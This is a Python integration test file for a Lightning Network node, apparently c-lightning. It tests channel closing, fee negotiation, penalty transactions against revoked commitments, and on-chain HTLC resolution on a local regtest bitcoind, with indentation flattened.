for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12 = l1.fund_channel(l2, 10**6)
chan13 = l1.fund_channel(l3, 10**6)
chan14 = l1.fund_channel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 3
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
    # l1 can't spend the output sent to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
        # Check that the other output's address is addr
assert addr == bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey']['addresses'][0]
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
@unittest.skipIf(not COMPAT, "needs COMPAT=1")
def test_deprecated_closing_compat(node_factory, bitcoind, chainparams):
""" The old-style close command is:
close {id} {force} {timeout}
"""
l1, l2 = node_factory.get_nodes(2, opts=[{'allow-deprecated-apis': True}, {}])
addr = chainparams['example_addr']
nodeid = l2.info['id']
l1.rpc.check(command_to_check='close', id=nodeid)
# New-style
l1.rpc.check(command_to_check='close', id=nodeid, unilateraltimeout=10, destination=addr)
l1.rpc.check(command_to_check='close', id=nodeid, unilateraltimeout=0)
l1.rpc.check(command_to_check='close', id=nodeid, destination=addr)
# Old-style
l1.rpc.check(command_to_check='close', id=nodeid, force=False)
l1.rpc.check(command_to_check='close', id=nodeid, force=False, timeout=10)
l1.rpc.check(command_to_check='close', id=nodeid, timeout=10)
l1.rpc.call('check', ['close', nodeid])
# Array(new-style)
l1.rpc.call('check', ['close', nodeid, 10])
l1.rpc.call('check', ['close', nodeid, 0, addr])
l1.rpc.call('check', ['close', nodeid, None, addr])
# Array(old-style)
l1.rpc.call('check', ['close', nodeid, True, 10])
l1.rpc.call('check', ['close', nodeid, False])
l1.rpc.call('check', ['close', nodeid, None, 10])
# Not new-style nor old-style
with pytest.raises(RpcError, match=r'Expected unilerataltimeout to be a number'):
l1.rpc.call('check', ['close', nodeid, "Given enough eyeballs, all bugs are shallow."])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
    # Wait for nodes to notice the failure; this search needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
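    # Run the payment attempt in a background thread; the result (None on
    # success, the exception on failure) is reported back via the queue.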
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
    # We recognize the different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
